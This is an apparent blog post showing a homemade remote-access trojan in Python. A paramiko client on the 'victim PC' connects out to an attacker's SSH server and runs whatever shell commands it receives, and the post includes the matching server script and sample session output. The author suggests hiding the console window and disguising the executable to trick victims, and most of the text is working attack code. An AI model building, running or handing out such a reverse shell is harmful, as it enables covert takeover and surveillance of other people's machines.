I like TV shows, especially SciFi genre. In those dramas, hackers uses some special tools to take control of someone’s PCs. It’s very scary, and I’m really worried when I saw the “Shut up and Dance (Black Mirror)“. I’m not worried about something I watch on my PCs, but it’s very uncomfortable if anyone can look at my house through those cameras.
This project is a starting point to know how these attacks can be made. Still it’s very simple, but quite effective.
Diagram:

Output Example:
On the display, it looks like it’s not doing anything noteworthy. But it makes a connection to the external server and it allows someone to control your PC. Only the thing you need to do on the victim PC is just a click of exe. file. With some more effort, you can hide this command prompt, or you can also make more sophisticated image of (dummy) application to trick the victim.
[ on Victim PC ]

[ on the server ]
# python3 bh_sshserver.py 10.20.254.30 2022
[+] Listening for connection ...
[+] Got a connection!
[+] Authenticated!
b'ClientConnected'
Enter command: ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : EC2AMAZ-1J6P9JB
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : us-east-1.ec2-utilities.amazonaws.com
ec2.internal
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : ec2.internal
Description . . . . . . . . . . . : AWS PV Network Device #0
Physical Address. . . . . . . . . : 12-50-04-B4-6A-10
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::39be:13ca:2a9b:a07%3(Preferred)
IPv4 Address. . . . . . . . . . . : 172.31.1.232(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, May 20, 2018 8:06:27 PM
Lease Expires . . . . . . . . . . : Sunday, May 20, 2018 11:06:2
Enter command: exit
exiting
[-] Caught exception: exit
Here is the code:
[ on victim PC ]
import paramiko
import subprocess
def ssh_command(ip, user, passwd, port, command):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd, port=port)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.send(command)
print(ssh_session.recv(1024))
while True:
command = str(ssh_session.recv(1024),'utf-8')
try:
cmd_output = subprocess.check_output(command, shell=True)
ssh_session.send(cmd_output)
except Exception as e:
ssh_session.send(str(e))
client.close()
return
ssh_command('server-ip-address', 'victim-a', 'passw0rd', 2022, 'ClientConnected')
[ on the server ]
import socket
import threading
import paramiko
import sys
host_key = paramiko.RSAKey(filename='data_source/test_rsa.key')
class Server(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
def check_auth_password(self, username, password):
if (username == 'victim-a') and (password == 'passw0rd'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port))
sock.listen(100)
print("[+] Listening for connection ...")
client, addr = sock.accept()
except Exception as e:
print(f"[-] Listen failed: {str(e)}")
sys.exit(1)
print("[+] Got a connection!")
try:
bhSession = paramiko.Transport(client)
bhSession.add_server_key(host_key)
server = Server()
try:
bhSession.start_server(server=server)
except paramiko.SSHException as x:
print("[-] SSH negotiation failed.")
chan = bhSession.accept(20)
print("[+] Authenticated!")
print(chan.recv(1024))
chan.send('Welcome to bh_ssh')
while True:
try:
command = input("Enter command: ")
if command != 'exit':
chan.send(command)
print(str(chan.recv(1024),'utf-8'))
else:
chan.send('exit')
print('exiting')
bhSession.close()
raise Exception('exit')
except KeyboardInterrupt:
bhSession.close()
except Exception as e:
print(f"[-] Caught exception: {str(e)}")
try:
bhSession.close()
except:
pass
sys.exit(1)